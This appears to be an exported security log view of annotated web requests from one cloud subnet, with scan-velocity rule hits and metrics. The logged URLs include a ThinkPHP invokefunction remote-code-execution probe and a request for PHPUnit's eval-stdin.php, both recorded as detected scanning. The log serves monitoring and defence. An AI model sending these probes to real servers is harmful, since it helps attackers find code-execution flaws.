# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510

ann scan_velocity 28 label scan_velocity

Request Scan-velocity indicator: scanv:unique_paths

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

Annotation facts

label

scan_velocity

rule

scanv:unique_paths

conf

90.00

details

upm_nonstatic_equiv=28.0; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

summary

Scan-velocity indicator: scanv:unique_paths

details

upm_nonstatic_equiv=28.0; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510

ann scan_velocity 28 label scan_velocity

Request Scan-velocity indicator: scanv:rpm

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

Annotation facts

label

scan_velocity

rule

scanv:rpm

conf

90.00

details

rpm_equiv=56.7; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

summary

Scan-velocity indicator: scanv:rpm

details

rpm_equiv=56.7; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510

ann scan_velocity 28 label scan_velocity

Request Scan-velocity indicator: scanv:ext_enum

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

Annotation facts

label

scan_velocity

rule

scanv:ext_enum

conf

90.00

details

ext_hits=75; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

summary

Scan-velocity indicator: scanv:ext_enum

details

ext_hits=75; score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510

ann scan_velocity 28 label scan_velocity

Request Scan-velocity indicator: scanv:404_ratio

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

Annotation facts

label

scan_velocity

rule

scanv:404_ratio

conf

90.00

details

404=77/85(0.91); score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

summary

Scan-velocity indicator: scanv:404_ratio

details

404=77/85(0.91); score=14; window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510

ann scan_velocity label scan_velocity

Request Scan-velocity window summary

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

Annotation facts

label

scan_velocity

rule

scanv:window

conf

—

details

window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

summary

Scan-velocity window summary

details

window=90s; total=85; rpm_equiv=56.7; upm_nonstatic_equiv=28.0; 404=77/85(0.91); ext_hits=75; ua_sig=0; methods=['GET', 'POST']

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:08 event 16731428 GET 404 bytes 28510

ann base label observed

Request event observed

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:08 event 16731424 GET 404 bytes 28510

ann base label observed

Request event observed

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:07 event 16731420 GET 404 bytes 28510

ann base label observed

Request event observed

/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:07 event 16731417 GET 404 bytes 28510

ann base label observed

Request event observed

/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:06 event 16731413 GET 404 bytes 28510

ann scan_velocity 26 label scan_velocity

Request Scan-velocity indicator: scanv:rpm

/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

referer

Custom-AsyncHttpClient

Annotation facts

label

scan_velocity

rule

scanv:rpm

conf

90.00

details

rpm_equiv=54.7; score=13; window=90s; total=82; rpm_equiv=54.7; upm_nonstatic_equiv=26.7; 404=74/82(0.90); ext_hits=72; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

referer

Custom-AsyncHttpClient

summary

Scan-velocity indicator: scanv:rpm

details

rpm_equiv=54.7; score=13; window=90s; total=82; rpm_equiv=54.7; upm_nonstatic_equiv=26.7; 404=74/82(0.90); ext_hits=72; ua_sig=0; methods=['GET', 'POST']

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:06 event 16731413 GET 404 bytes 28510

ann scan_velocity 26 label scan_velocity

Request Scan-velocity indicator: scanv:ext_enum

/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

referer

Custom-AsyncHttpClient

Annotation facts

label

scan_velocity

rule

scanv:ext_enum

conf

90.00

details

ext_hits=72; score=13; window=90s; total=82; rpm_equiv=54.7; upm_nonstatic_equiv=26.7; 404=74/82(0.90); ext_hits=72; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

referer

Custom-AsyncHttpClient

summary

Scan-velocity indicator: scanv:ext_enum

details

ext_hits=72; score=13; window=90s; total=82; rpm_equiv=54.7; upm_nonstatic_equiv=26.7; 404=74/82(0.90); ext_hits=72; ua_sig=0; methods=['GET', 'POST']

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

Log Explorer

Annotated access events

Confirm Action